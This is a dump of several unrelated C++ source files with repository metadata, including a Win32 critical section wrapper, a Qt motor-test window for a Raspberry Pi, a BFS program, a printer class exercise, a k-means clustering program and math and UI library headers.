#define FUNS(FUN) \
std::vector<double> FUN(const std::vector<double>& x);
FUNS(exp); FUNS(log); FUNS(cos); FUNS(sin); FUNS(tan); FUNS(fabs); FUNS(atan);
#undef FUNS
#endif
|
215bd2d8921af9431cbbb71e51a73e0a4a34c914
|
0ef4f71c8ff2f233945ee4effdba893fed3b8fad
|
/misc_microsoft_gamedev_source_code/misc_microsoft_gamedev_source_code/xcore/threading/CriticalSection.h
|
e7535c068137e0e4c27f247b32ebb59d2ffb1eaa
|
[] |
no_license
|
sgzwiz/misc_microsoft_gamedev_source_code
|
1f482b2259f413241392832effcbc64c4c3d79ca
|
39c200a1642102b484736b51892033cc575b341a
|
refs/heads/master
| 2022-12-22T11:03:53.930024
| 2020-09-28T20:39:56
| 2020-09-28T20:39:56
| null | 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 2,708
|
h
|
CriticalSection.h
|
//============================================================================
//
// CriticalSection.h
//
// Copyright (c) 1999-2006, Ensemble Studios
//
//============================================================================
#pragma once
#ifndef XBOX
#if (_WIN32_WINNT < 0x0403)
#error Please define _WIN32_WINNT to be 0x0403 or greater before including windows.h!
#endif
#endif
//----------------------------------------------------------------------------
// Class BCriticalSection
//----------------------------------------------------------------------------
class BCriticalSection
{
public:
//-- Construction/Destruction
inline BCriticalSection(uint spinCount = 0)
{
#ifdef BUILD_DEBUG
mLockCount = 0;
#endif
InitializeCriticalSectionAndSpinCount(&mCrit, spinCount);
}
inline ~BCriticalSection()
{
#ifdef BUILD_DEBUG
MemoryBarrier();
if (mLockCount)
{
OutputDebugStringA("BCriticalSection::~BCriticalSection: WARNING: Deleting a critical section that may still be locked!\n");
}
#endif
DeleteCriticalSection(&mCrit);
}
//-- Interface
inline void setSpinCount(uint spinCount)
{
SetCriticalSectionSpinCount(&mCrit, spinCount);
}
inline void lock(void)
{
EnterCriticalSection(&mCrit);
#ifdef BUILD_DEBUG
mLockCount++;
#endif
}
inline void unlock(void)
{
#ifdef BUILD_DEBUG
if (mLockCount < 1)
DebugBreak();
mLockCount--;
#endif
LeaveCriticalSection(&mCrit);
}
private:
//-- Disable copy constructor and equals operator.
BCriticalSection(const BCriticalSection& crit);
const BCriticalSection& operator = (const BCriticalSection& crit);
//-- Private Data
CRITICAL_SECTION mCrit;
#ifdef BUILD_DEBUG
int mLockCount;
#endif
};
//----------------------------------------------------------------------------
// Class BScopedCriticalSection
//----------------------------------------------------------------------------
class BScopedCriticalSection
{
public:
//-- Construction/Destruction
inline BScopedCriticalSection (BCriticalSection& crit) : mCrit(crit) { mCrit.lock(); }
inline ~BScopedCriticalSection() { mCrit.unlock(); }
private:
//-- Disable copy constructor and equals operator.
BScopedCriticalSection(const BScopedCriticalSection& crit);
BScopedCriticalSection& operator = (const BScopedCriticalSection& crit);
//-- Private Data
BCriticalSection& mCrit;
};
|
cad1a7454bc324f518b47baf23dd0f3348f018fe
|
e779b32244baf17871f1404674740ccb773ffbb3
|
/mainwindow.cpp
|
acba6528d148158334638ce6f8ea30315181b47e
|
[] |
no_license
|
BillSnook/PiWorld
|
a12e0cccaf8bce7cea8de59297bccdaf1fe04dc4
|
17c793e3222ddc3f013fc044054bd540c0a22759
|
refs/heads/master
| 2021-09-11T14:25:46.996027
| 2018-04-08T23:20:57
| 2018-04-08T23:20:57
| 110,402,973
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 13,940
|
cpp
|
mainwindow.cpp
|
#include "mainwindow.h"
#include "ui_mainwindow.h"
#include "commpi.h"
#include "hardware.h"
#include "filer.h"
MainWindow::MainWindow(QWidget *parent) :
QMainWindow(parent),
ui(new Ui::MainWindow) {
ui->setupUi(this);
setFixedSize(600, 500);
#ifdef ON_PI
fprintf(stderr,"ON_PI is defined");
#else
fprintf(stderr,"ON_PI is not defined");
#endif // ON_PI
menuSetup();
ui->connectBox->hide();
ui->talkBox->hide();
buttonSetup();
slotMotorMenu(); // Or slotCommMenu(); // if we want to start with that as defaulthowSpeed
}
void MainWindow::menuSetup() {
commMode = false;
motorMode = false;
connect(ui->CommTest, SIGNAL (triggered()), this, SLOT (slotCommMenu()));
connect(ui->MotorTest, SIGNAL (triggered()), this, SLOT (slotMotorMenu()));
}
void MainWindow::buttonSetup() {
ui->connectButton->setCheckable(true);
ui->okButton->setCheckable(true);
ui->helloButton->setCheckable(true);
ui->blinkButton->setCheckable(true);
ui->stopButton->setCheckable(true);
ui->okButton_2->setCheckable(false);
ui->helloButton_2->setCheckable(false);
ui->blinkButton_2->setCheckable(false);
ui->stopButton_2->setCheckable(false);
ui->testButton0->setCheckable(false);
ui->testButton1->setCheckable(false);
ui->testButton2->setCheckable(false);
ui->testButton3->setCheckable(false);
connect(ui->connectButton, SIGNAL (clicked(bool)), this, SLOT (slotConnectClicked(bool)));
connect(ui->okButton, SIGNAL (clicked(bool)), this, SLOT (b0l(bool)));
connect(ui->helloButton, SIGNAL (clicked(bool)), this, SLOT (b1l(bool)));
connect(ui->blinkButton, SIGNAL (clicked(bool)), this, SLOT (b2l(bool)));
connect(ui->stopButton, SIGNAL (clicked(bool)), this, SLOT (b3l(bool)));
connect(ui->okButton_2, SIGNAL (clicked(bool)), this, SLOT (b0r(bool)));
connect(ui->helloButton_2, SIGNAL (clicked(bool)), this, SLOT (b1r(bool)));
connect(ui->blinkButton_2, SIGNAL (clicked(bool)), this, SLOT (b2r(bool)));
connect(ui->stopButton_2, SIGNAL (clicked(bool)), this, SLOT (b3r(bool)));
connect(ui->testButton0, SIGNAL (clicked(bool)), this, SLOT (tb0(bool)));
connect(ui->testButton1, SIGNAL (clicked(bool)), this, SLOT (tb1(bool)));
connect(ui->testButton2, SIGNAL (clicked(bool)), this, SLOT (tb2(bool)));
connect(ui->testButton3, SIGNAL (clicked(bool)), this, SLOT (tb3(bool)));
}
void MainWindow::connectSetup() {
ui->talkAddress->setText( "develop32" ); // Initial setting
if ( nullptr == piPtr ) {
piPtr = new commPi();
}
connected = piPtr->getCommStateConnected();
if (connected) {
ui->connectButton->setText("Disconnect");
ui->talkBox->show();
} else {
ui->connectButton->setText("Connect");
ui->talkBox->hide();
}
ui->connectButton->setChecked(connected);
}
void MainWindow::sliderSetup() {
ui->m0Slider->setRange( 0, SLIDER_RESOLUTION );
ui->m0Slider->show();
connect(ui->m0Slider, SIGNAL (valueChanged(int)), this, SLOT (sliderChanged0(int)));
ui->m1Slider->setRange( 0, SLIDER_RESOLUTION );
ui->m1Slider->show();
connect(ui->m1Slider, SIGNAL (valueChanged(int)), this, SLOT (sliderChanged1(int)));
ui->m2Slider->setRange( 0, 16 );
ui->m2Slider->show();
connect(ui->m2Slider, SIGNAL (valueChanged(int)), this, SLOT (sliderChanged2(int)));
ui->m3Slider->setRange( 0, SLIDER_RESOLUTION );
ui->m3Slider->show();
connect(ui->m3Slider, SIGNAL (valueChanged(int)), this, SLOT (sliderChanged3(int)));
}
void MainWindow::sliderChanged0(int newValue) {
fprintf(stderr,"sliderChanged0\n");
ui->messageTextLine->setText( QString::number(newValue) );
slider[0] = newValue;
}
void MainWindow::sliderChanged1(int newValue) {
fprintf(stderr,"sliderChanged1\n");
ui->messageTextLine->setText( QString::number(newValue) );
slider[1] = newValue;
}
void MainWindow::sliderChanged2(int newValue) {
fprintf(stderr,"sliderChanged2\n");
ui->messageTextLine->setText( QString::number(newValue) );
slider[2] = newValue;
ui->m0Slider->setValue( speed[newValue].left );
ui->m1Slider->setValue( speed[newValue].right );
}
void MainWindow::sliderChanged3(int newValue) {
fprintf(stderr,"sliderChanged3\n");
ui->messageTextLine->setText( QString::number(newValue) );
slider[3] = newValue;
}
MainWindow::~MainWindow() {
delete ui;
}
//MARK: Menu actions
void MainWindow::slotCommMenu() {
commMode = true;
motorMode = false;
connectSetup();
ui->connectBox->show();
ui->okButton->setText("OK");
ui->helloButton->setText("Hello");
ui->blinkButton->setText("Blink");
ui->stopButton->setText("Stop");
ui->okButton_2->hide();
ui->helloButton_2->hide();
ui->blinkButton_2->hide();
ui->stopButton_2->hide();
ui->testButton0->hide();
ui->testButton1->hide();
ui->testButton2->hide();
ui->testButton3->hide();
ui->m0Slider->hide();
ui->m1Slider->hide();
ui->m2Slider->hide();
ui->m3Slider->hide();
}
void MainWindow::slotMotorMenu() {
commMode = false;
motorMode = true;
ui->talkAddress->setText( "" );
ui->connectButton->setText("Setup IO");
ui->connectBox->show();
ui->okButton->setText("left -");
ui->helloButton->setText("right -");
ui->blinkButton->setText("speed -");
ui->stopButton->setText("-");
ui->okButton_2->setText("+ left");
ui->helloButton_2->setText("+ right");
ui->blinkButton_2->setText("+ speed");
ui->stopButton_2->setText("+");
ui->testButton0->setText("Start");
ui->testButton1->setText("Stop");
ui->testButton2->setText("Accept");
ui->testButton3->setText("Reverse");
ui->okButton_2->show();
ui->helloButton_2->show();
ui->blinkButton_2->show();
ui->stopButton_2->show();
ui->testButton0->show();
ui->testButton1->show();
ui->testButton2->show();
ui->testButton3->show();
running = false;
readSpeed();
slider[0] = speed[0].left;
slider[1] = speed[0].right;
slider[2] = 0;
slider[3] = 0;
sliderSetup();
}
// MARK: Button actions
void MainWindow::slotConnectClicked(bool checked) {
if (commMode ) { // Connect to enable communication test
if (checked) {
ui->connectButton->setText("Connecting");
QString targetString = ui->talkAddress->text();
const char *targetAddr = targetString.toUtf8().constData();
size_t len = targetString.length();
char *tAddr = (char *)malloc( len + 7 );
memcpy( tAddr, targetAddr, len );
tAddr[len] = 0;
strcat( tAddr, ".local" );
fprintf(stderr,"Target address: %s\n", tAddr);
connected = true; // piPtr->connectTo( tAddr );
free( tAddr );
if ( connected ) {
ui->connectButton->setText("Disconnect");
ui->talkBox->show();
} else {
ui->connectButton->setText("Connect");
ui->talkBox->hide();
}
ui->connectButton->setChecked(connected);
} else {
connected = piPtr->detachFrom();
ui->connectButton->setText("Connect");
ui->talkBox->hide();
}
} else {
if (motorMode) { // Setup for motor test
if (checked) {
if ( nullptr == hw ) {
hw = new hardware();
}
connected = hw->setupForDCMotors();
ui->connectButton->setText("Setting Up");
ui->talkAddress->setText( "Test Setup" ); // ?
if ( connected ) {
fprintf(stderr,"connected\n");
ui->connectButton->setText("Cleanup IO");
ui->talkBox->show();
} else {
fprintf(stderr,"not connected\n");
ui->connectButton->setText("Not Ready");
ui->talkBox->hide();
ui->connectButton->setChecked(false);
}
} else {
ui->talkAddress->setText( "" );
connected = hw->resetForDCMotors();
hw = nullptr;
ui->connectButton->setText("Setup IO");
ui->talkBox->hide();
}
} else {
ui->talkAddress->setText( "No mode set - use menu" );
}
}
}
void MainWindow::b0l(bool checked) {
if (commMode ) {
ui->okButton->setChecked(!checked);
ui->messageTextLine->setText("ok");
char *resp = piPtr->sendMessage( "ok\n" );
ui->responseDisplay->setPlainText(resp);
}
if (motorMode) {
ui->okButton->setChecked(false);
if ( slider[0] > 0 ) {
ui->m0Slider->setValue( slider[0] - 1 );
} else {
ui->m0Slider->setValue( 0 );
}
}
}
void MainWindow::b1l(bool checked) {
if (commMode ) {
ui->helloButton->setChecked(!checked);
ui->messageTextLine->setText("hello");
char *resp = piPtr->sendMessage( "hello\n" );
ui->responseDisplay->setPlainText(resp);
}
if (motorMode) {
ui->helloButton->setChecked(false);
if ( slider[1] > 0 ) {
ui->m1Slider->setValue( slider[1] - 1 );
} else {
ui->m1Slider->setValue( 0 );
}
}
}
void MainWindow::b2l(bool checked) {
if (commMode ) {
ui->blinkButton->setChecked(!checked);
ui->messageTextLine->setText("blink");
char *resp = piPtr->sendMessage( "blink\n" );
ui->responseDisplay->setPlainText(resp);
}
if (motorMode) {
ui->blinkButton->setChecked(false);
fprintf(stderr,"b2l s2: %d\n", slider[2]);
if ( slider[2] > 0 ) {
ui->m2Slider->setValue( slider[2] - 1 );
ui->m0Slider->setValue( speed[slider[2]].left );
ui->m1Slider->setValue( speed[slider[2]].right );
} else {
ui->m2Slider->setValue( 0 );
ui->m0Slider->setValue( speed[0].left );
ui->m1Slider->setValue( speed[0].right );
}
if ( running ) {
hw->setMtrSpd( 0, speed[slider[2]].left );
hw->setMtrSpd( 1, speed[slider[2]].right );
}
}
}
void MainWindow::b3l(bool checked) {
if (commMode ) {
ui->stopButton->setChecked(!checked);
ui->messageTextLine->setText("blinkstop");
char *resp = piPtr->sendMessage( "blinkstop\n" );
ui->responseDisplay->setPlainText(resp);
}
if (motorMode) {
ui->stopButton->setChecked(false);
readSpeed();
}
}
void MainWindow::b0r(bool checked) {
if (motorMode) {
ui->okButton->setChecked(false);
if ( slider[0] < SLIDER_RESOLUTION ) {
ui->m0Slider->setValue( slider[0] + 1 );
} else {
ui->m0Slider->setValue( SLIDER_RESOLUTION - 1 );
}
}
}
void MainWindow::b1r(bool checked) {
if (motorMode) {
ui->helloButton->setChecked(false);
if ( slider[1] < SLIDER_RESOLUTION ) {
ui->m1Slider->setValue( slider[1] + 1 );
} else {
ui->m1Slider->setValue( SLIDER_RESOLUTION - 1 );
}
}
}
void MainWindow::b2r(bool checked) {
if (motorMode) {
ui->blinkButton->setChecked(false);
fprintf(stderr,"b2r s2: %d\n", slider[2]);
if ( slider[2] < 16 ) {
ui->m2Slider->setValue( slider[2] + 1 );
ui->m0Slider->setValue( speed[slider[2]].left );
ui->m1Slider->setValue( speed[slider[2]].right );
} else {
ui->m2Slider->setValue( SPEED_ARRAY - 1 );
ui->m0Slider->setValue( speed[SPEED_ARRAY - 1].left );
ui->m1Slider->setValue( speed[SPEED_ARRAY - 1].right );
}
if ( running ) {
hw->setMtrSpd( 0, speed[slider[2]].left );
hw->setMtrSpd( 1, speed[slider[2]].right );
}
}
}
void MainWindow::b3r(bool checked) {
if (motorMode) {
ui->stopButton->setChecked(false);
saveSpeed();
}
}
void MainWindow::tb0(bool checked) {
fprintf(stderr,"tb0: start\n");
if ( ! running ) {
running = true;
hw->setMtrDirSpd( 0, 1, speed[slider[2]].left );
hw->setMtrDirSpd( 1, 1, speed[slider[2]].right );
}
}
void MainWindow::tb1(bool checked) {
fprintf(stderr,"tb1: stop\n");
running = false;
hw->setMtrDirSpd( 0, 1, 0 );
hw->setMtrDirSpd( 1, 1, 0 );
}
void MainWindow::tb2(bool checked) {
fprintf(stderr,"tb2, s0: %d, s1: %d, s2: %d\n", slider[0], slider[1], slider[2]);
speed[slider[2]].left = slider[0];
speed[slider[2]].right = slider[1];
showSpeed();
}
void MainWindow::tb3(bool checked) {
fprintf(stderr,"tb3\n");
if ( ! running ) {
running = true;
hw->setMtrDirSpd( 0, 1, 0);
hw->setMtrDirSpd( 1, 1, 0);
}
hw->setMtrDirSpd( 0, 0, speed[slider[2]].left );
hw->setMtrDirSpd( 1, 0, speed[slider[2]].right );
}
void MainWindow::saveSpeed() {
fprintf(stderr,"saveSpeed\n");
filer *fi = new filer();
fi->saveData( &speed[0] );
delete fi;
}
void MainWindow::readSpeed() {
fprintf(stderr,"readSpeed\n");
filer *fi = new filer();
if ( fi->readData( &speed[0] ) ) { // If saved speed is read from file
showSpeed();
} else { // Else initialize to zeros
for ( int i = 0; i < SPEED_ARRAY; i++ ) {
speed[i].left = 0;
speed[i].right = 0;
}
}
delete fi;
}
void MainWindow::showSpeed() {
fprintf(stderr,"showSpeed\n");
for ( int i = 0; i < 8; i++ ) {
fprintf(stderr,"%d l: %d, r: %d\n", i, speed[i].left, speed[i].right);
}
}
|
fe79943473f96f1b70b4c392a9a37fe40d9889da
|
47c5c5b194dff3fb8a95721effc599591e90519a
|
/solved/4892.cpp
|
08ea8720fe15a1267c17bf069c10286f50e40ac6
|
[] |
no_license
|
LEECHHE/acmicpc
|
75ba56e3cd7a2d8d9c43f83e151632a58823840f
|
8717bc33b53ac44037d9f58ee1d0b58014084648
|
refs/heads/master
| 2020-04-06T06:57:07.679362
| 2018-12-10T09:12:06
| 2018-12-10T09:12:06
| 65,816,339
| 3
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 645
|
cpp
|
4892.cpp
|
#include <cstdio>
#include <algorithm>
using namespace std;
void solve(int k, int n){
switch (k) {
case 0:
solve(1, 3*n);
break;
case 1:
n%2 ? printf("odd ") : printf("even ");
solve(2, (n+n%2)/2);
break;
case 2:
solve(3, 3*n);
break;
case 3:
solve(4, n/9);
break;
case 4:
printf("%d\n",n);
break;
}
}
int main(){
for (int i=1; ; ++i) {
int n; scanf("%d",&n);
if (n==0) break;
printf("%d. ",i);
solve(0, n);
}
return 0;
}
|
fedd6968b8458ddc7e74317e44c6f0efdfa804cf
|
74030bc8c1fb673eb3f2b960e09f4f631f52c83c
|
/bfs.cpp
|
1cf1da069b504756da50388f9f11aa885e892f41
|
[] |
no_license
|
jasfin/CPP-Programming
|
607df9501581459c6f3e93e61ed2e1d1df6dd9e1
|
1930ddcb3b097af4bf2bfe1a470f598776e5e407
|
refs/heads/master
| 2020-06-08T17:17:37.706236
| 2019-06-22T19:31:09
| 2019-06-22T19:31:09
| 193,271,009
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 1,410
|
cpp
|
bfs.cpp
|
#include<bits/stdc++.h>
using namespace std;
int main()
{
int n,a,b;
cout<<"enter number of elements in the graph";
cin>>n;
int arr[n][n];
for(int i=0;i<n;i++)
for(int j=0;j<n;j++)
arr[i][j]=0;
int ch=1;
while(ch==1)
{
cout<<"enter relationship elements";
cin>>a>>b;
arr[a-1][b-1]=1;
arr[b-1][a-1]=1;
cout<<"press 1 to continue";
cin>>ch;
}
for(int i=0;i<n;i++)
{
cout<<"\n";
for(int j=0;j<n;j++)
cout<<arr[i][j]<<"\t";
}
int item,visited[n+1]={0},level[n+1],parent[n+1];
parent[1]=-1;
level[1]=0;
queue<int> q;
q.push(1);
while(q.empty()!=1)
{
item=q.front();
q.pop();
for(int i=0;i<n;i++)
if(arr[item-1][i]==1 && visited[i+1]==0)
{
q.push(i+1);
parent[i+1]=item;
level[i+1]=level[item]+1;
}
cout<<item<<" ";
visited[item]=1;
}
cout<<"\n\n";
cout<<"level array :";
for(int i=1;i<=n;i++)
cout<<level[i]<<" ";
cout<<"\n\n";
cout<<"parent array";
for(int i=1;i<=n;i++)
cout<<parent[i]<<" ";
cout<<"enter indices to find the path in between"<<endl;
int u,v;
cin>>u>>v;
int k=v;
vector<int> path;
while(k!=u)
{
path.push_back(k);
k=parent[k];
}
path.push_back(u);
cout<<"the path is"<<endl;
k=path.size()-1;
while(k>=0)
cout<<path[k--]<<"\t";
//cout<<u<<"\t";
cout<<"\n\n";
}
|
1f4e73c74aa1363d15bfbdc054144627af2c4147
|
1c47514b5eaf82cac46cb3ec1d756bbde6c8292a
|
/include/pet/animal.hpp
|
17b078f5c5d1ff74f45222eb167864f46f61f395
|
[
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
olned/vscode-try-pybind11
|
d9e75a0f6b4cb38ac7ae98a82e0faa570cc54685
|
34cb425309246493fcf7dd42be97825ae0b6f2b0
|
refs/heads/master
| 2022-10-17T00:27:46.896720
| 2020-06-13T13:57:30
| 2020-06-13T13:57:30
| 271,533,279
| 0
| 0
|
NOASSERTION
| 2020-06-13T13:57:32
| 2020-06-11T11:51:55
|
C++
|
UTF-8
|
C++
| false
| false
| 258
|
hpp
|
animal.hpp
|
#pragma once
#include <string>
class Animal {
public:
virtual ~Animal() { }
virtual std::string name() { return "unknown"; }
virtual std::string go(int n_times) = 0;
};
std::string call_go(Animal *animal);
std::string get_name(Animal *animal);
|
8a5eb1dacaf225488d687f0f0f2954969bb43266
|
1de331d068456cedbd2a5b4d4a6b16145646f97d
|
/src/libv/ui/generate_name.hpp
|
14f1fd266a475c30fc0557c18be7de4d9d0b5d28
|
[
"Zlib"
] |
permissive
|
sheerluck/libv
|
ed37015aeeb49ea8504d7b3aa48a69bde754708f
|
293e382f459f0acbc540de8ef6283782b38d2e63
|
refs/heads/master
| 2023-05-26T01:18:50.817268
| 2021-04-18T01:06:51
| 2021-04-27T03:20:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 457
|
hpp
|
generate_name.hpp
|
// Project: libv.ui, File: src/libv/ui/generate_name.hpp, Author: Császár Mátyás [Vader]
#pragma once
namespace libv {
namespace ui {
// -------------------------------------------------------------------------------------------------
struct GenerateName_t {};
static constexpr GenerateName_t GenerateName;
// -------------------------------------------------------------------------------------------------
} // namespace ui
} // namespace libv
|
5f77bcc9afcd5425e0cc4ce230d7be76f8ab20f5
|
f6786f5f51c0a71a09213e2f729766d1a04dffa2
|
/명품_C++/08CHAPTER/08_Print_Laser_Inkjet.cpp
|
e51c9cc9c2e78bf0e8f23edfe5ac31150d4ee112
|
[] |
no_license
|
SuperstarterJaeeun/Learn-Programming-Book
|
4f075fdec386a0449da8d0d08bb8f1b6d6b2f304
|
f768acfffcb20b9fc97946ca491f6ffb20671896
|
refs/heads/master
| 2023-07-24T07:13:24.374240
| 2021-09-06T14:56:02
| 2021-09-06T14:56:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 3,462
|
cpp
|
08_Print_Laser_Inkjet.cpp
|
#include <iostream>
#include <string>
using namespace std;
class Printer {
string model; //Model name
string manufacturer; //Manufacturer
int printedCount; //print buying
int availableCount; //print paper residues
public:
Printer(string model, string manufacturer, int availableCount);
void print(int pages);
void show();
bool prin(int pages);
};
Printer::Printer(string model, string manufacturer, int availableCount) {
this->model = model;
this->manufacturer = manufacturer;
this->printedCount = 0;
this->availableCount = availableCount;
}
void Printer::print(int pages) {
if (availableCount > pages)
{
availableCount -= pages;
cout << "I've printed it." << endl;
}
else
cout << "There is not enough paper to print." << endl;
}
void Printer::show() {
cout << model << ", " << manufacturer << ", leftover paper " << availableCount;
}
bool Printer::prin(int pages) {
if (availableCount >= pages)
return true;
else
return false;
}
class InkjetPrinter : public Printer {
int availableInk; //ink residue
public:
InkjetPrinter(string model, string manufasturer, int availableCount, int availableInk);
void printInkJet(int pages);
void showInk();
};
InkjetPrinter::InkjetPrinter(string model, string manufasturer, int availableCount, int availableInk) :Printer(model, manufasturer, availableCount) {
this->availableInk = availableInk;
}
void InkjetPrinter::printInkJet(int pages)
{
if (availableInk >= pages)
{
if (prin(pages))
availableInk = availableInk - pages;
print(pages);
}
else
cout << "There is not enough ink to print" << endl;
}
void InkjetPrinter::showInk() {
show();
cout << "leftover ink : " << availableInk << endl;
}
class LaserPrinter :public Printer {
int availableToner; //toner residue
public:
LaserPrinter(string model, string manufasturer, int availableCount, int availableToner);
void printLaser(int pages);
void showLaser();
};
LaserPrinter::LaserPrinter(string model, string manufasturer, int availableCount, int availableToner) : Printer(model, manufasturer, availableCount) {
this->availableToner = availableToner;
}
void LaserPrinter::printLaser(int pages)
{
if (availableToner > 0 && availableToner >= pages)
{
if (prin(pages))
availableToner--;
print(pages);
}
else
cout << "There is not enough toner to print." << endl;
}
void LaserPrinter::showLaser() {
show();
cout << "remaining toner : " << availableToner << endl;
}
void main()
{
int printer_selete, page;
char yes_no;
InkjetPrinter p1("Officejet V40", "HP", 5, 10);
LaserPrinter p2("SCX-6x45", "Samsung", 3, 20);
cout << "The two printers currently in operation are as follows." << endl;
cout << "InkjetPrinter : "; p1.showInk();
cout << "LaserPrinter : "; p2.showLaser();
cout << endl;
while (true)
{
cout << "Please Enter Print(1:InkjetPrinter, 2:LaserPrinter) and Page >> ";
cin >> printer_selete >> page;
if (printer_selete == 1)
p1.printInkJet(page);
else if (printer_selete == 2)
p2.printLaser(page);
else
cout << "Printers are only inkjet and laser. Please re-enter." << endl;
p1.showInk();
p2.showLaser();
cout << "Do you want to continue printing (y/n) >> ";
cin >> yes_no;
while (yes_no != 'y' && yes_no != 'n')
{
cout << "You've entered something wrong. Do you want to continue printing (y/n) >>";
cin >> yes_no;
}
if (yes_no == 'y')
cout << endl;
else if (yes_no == 'n')
exit(0);
cin.ignore();
cout << endl;
}
}
|
0dd6086c7a61a330bfd38b676ecf1d7dd2361757
|
4d7c76bdb8a2579937533fae4b766814f93da4e4
|
/src/oglml/vec/storagepolicies/staticswizzler.hpp
|
b8b8bf2dec0a4bb9e9fbd229d789892eae4fa99f
|
[] |
no_license
|
hpohl/oglml
|
3d64c55a9752d740cc8c7dceb34c94afa856b902
|
f36f97af11803111b0e122c525e2299a9c71a4b3
|
refs/heads/master
| 2021-01-20T00:56:46.355057
| 2011-12-21T21:20:35
| 2011-12-21T21:20:35
| 2,643,682
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 2,549
|
hpp
|
staticswizzler.hpp
|
#ifndef OGLML_VEC_STORAGEPOLICIES_STATICSWIZZLER_HPP
#define OGLML_VEC_STORAGEPOLICIES_STATICSWIZZLER_HPP
#include <vector>
#include <algorithm>
#include <cstddef>
#include <cassert>
#include <oglml/helpers/errors.hpp>
#include <oglml/helpers/indextools.hpp>
#include <oglml/helpers/operations.hpp>
namespace oglml {
namespace vec {
struct BaseStaticSwizzlerStorage { };
template <std::size_t nHost, typename THost, class SPHost, std::size_t... tindices>
struct StaticSwizzlerStorage : private BaseStaticSwizzlerStorage {
// Constants
oglml_constexpr static std::size_t indexcount = sizeof...(tindices);
oglml_constexpr static bool valid = oglml::detail::CheckIndices<nHost, tindices...>::passed;
oglml_constexpr static bool containsDuplicates =
oglml::detail::HasDuplicates<tindices...>::result;
// Indices as array
static const std::size_t indices[indexcount];
// Validate indices
static oglml_constexpr_if_available void validate()
{ static_assert(valid, "Indices are not valid."); }
static oglml_constexpr_if_available void noDuplicates()
{ static_assert(!containsDuplicates, OGLML_INDEX_DUPLICATES_ERROR_MSG); };
// Grab indices
static std::size_t index(std::size_t i)
{ validate(); assert(i < indexcount); return indices[i]; }
template <std::size_t n, typename T>
class Container {
typedef typename SPHost::template Container<nHost, THost> ContainerHost;
ContainerHost& host()
{ return *reinterpret_cast<ContainerHost*>(this); }
const ContainerHost& host() const
{ return *reinterpret_cast<const ContainerHost*>(this); }
public:
// Constants
oglml_constexpr static bool defineSwizzlers = false;
// Basic
T& operator[](std::size_t i)
{ return host()[index(i)]; }
const T& operator[](std::size_t i) const
{ return host()[index(i)]; }
};
};
template <std::size_t nHost, typename THost, class SPHost, std::size_t... tindices>
const std::size_t StaticSwizzlerStorage<nHost, THost, SPHost, tindices...>::indices[indexcount] = { tindices... };
} // namespace vec
} // namespace oglml
#endif // OGLML_VEC_STORAGEPOLICIES_STATICSWIZZLER_HPP
|
9d8f66b9723dffb24522add1a032472b735698eb
|
525eddcc24018a9cd24b06c19cd9d6332b9492bc
|
/A6/A6.cpp
|
20530dc9040089fad56d832adb9013fc5038e5da
|
[] |
no_license
|
iAmeeth/CL1-Codes-Elective-Data-Mining
|
b7b8b0d6852c81a246655373e5e0034eb8effa32
|
4d312486f44992a5bd80ed22672175453a829c46
|
refs/heads/master
| 2021-01-11T04:05:00.228519
| 2016-10-18T13:23:48
| 2016-10-18T13:23:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 2,299
|
cpp
|
A6.cpp
|
#include<iostream>
#include<vector>
#include<math.h>
#include<fstream>
#include <sstream>
using namespace std;
int main()
{
ifstream inData("ip.csv");
char delim;
ofstream out;
cout<<"KMEANS\n";
int n,k;
cout<<"Enter total number of coordinates\n";
cin>>n;
double x[n];
double y[n];
for(int i=0;i<n;i++)
{
inData>>x[i]>>delim>>y[i];
}
/*
for(int i=0;i<n;i++)
{
cout<<"Enter X-Coordinate\n";
cin>>x[i];
cout<<"Enter Y-Coordinate\n";
cin>>y[i];
cout<<"------------------------------\n";
}*/
cout<<"Entered Co-ordinates are:\n";
for(int i=0;i<n;i++)
{
cout<<"X-Coordinate\t"<<x[i];
cout<<"Y-Coordinate\t"<<y[i];
}
cout<<"\nEnter k value for number of clusters\n";
cin>>k;
vector<double> *mean;
mean = new vector<double>[2];
////CHANGED TO INT
int tempx,tempy;
cout<<"Enter initial seeds\n";
for(int i=0;i<k;i++)
{
cout<<"Enter X-Coordinate\n";
cin>>tempx;
mean[0].push_back(tempx);
cout<<"Enter Y-Coordinate\n";
cin>>tempy;
mean[1].push_back(tempy);
cout<<"------------------------------\n";
}
vector<double> *omean;
omean = new vector<double>[2];
vector<int> *cluster;
cluster = new vector<int>[n];
while(1)
{
//Copy new mean values to old mean vector
for(int i=0;i<2;i++)
{
omean[i]=mean[i];
}
//Clear cluster
////Changed n to k
for(int i=0;i<k;i++)
{
cluster[i].erase(cluster[i].begin(),cluster[i].end());
}
//Find Distance and find minimum value
for(int i=0;i<n;i++)
{
double min=99999;
int place;
for(int j=0;j<k;j++)
{
double dist = sqrt( pow( (x[i]-mean[0][j]) , 2 ) + pow( (y[i]-mean[1][j]) ,2) );
if(dist<min)
{
min=dist;
place=j;
}
}
cluster[place].push_back(i);
}
//Find mean values
for(int i=0;i<k;i++)
{
double xsum=0;
double ysum=0;
for(int j=0;j<cluster[i].size();j++)
{
xsum+=x[cluster[i][j]];
ysum+=y[cluster[i][j]];
}
mean[0][i]=xsum/cluster[i].size();
mean[1][i]=ysum/cluster[i].size();
}
//Check for termination
if(omean[0]==mean[0] && omean[1]==mean[1])
{
break;
}
}
out.open("op.csv");
for(int i=0;i<k;i++)
{
out<<"Cluster "<<i+1<<endl;
out<<"Mean of cluster\n";
out<<mean[0][i]<<","<<mean[1][i]<<endl;
out<<"Cluster data\n";
for(int j=0;j<cluster[i].size();j++)
{
int pos=cluster[i][j];
out<<x[pos]<<","<<y[pos]<<endl;
}
out<<endl;
}
out.close();
return 0;
}
|
bde98ee458b3e62298ec736e47585bde44474adc
|
ed4485942e9e92785ead30181d1fb76a794054be
|
/fable_build/string_array_fem.cpp
|
36a4e014d92b2b9e7baa84303aa29eb860b47681
|
[] |
no_license
|
ctessum/fable-go
|
4f2491edba2718b8d70245a0ad2aa603d54c532a
|
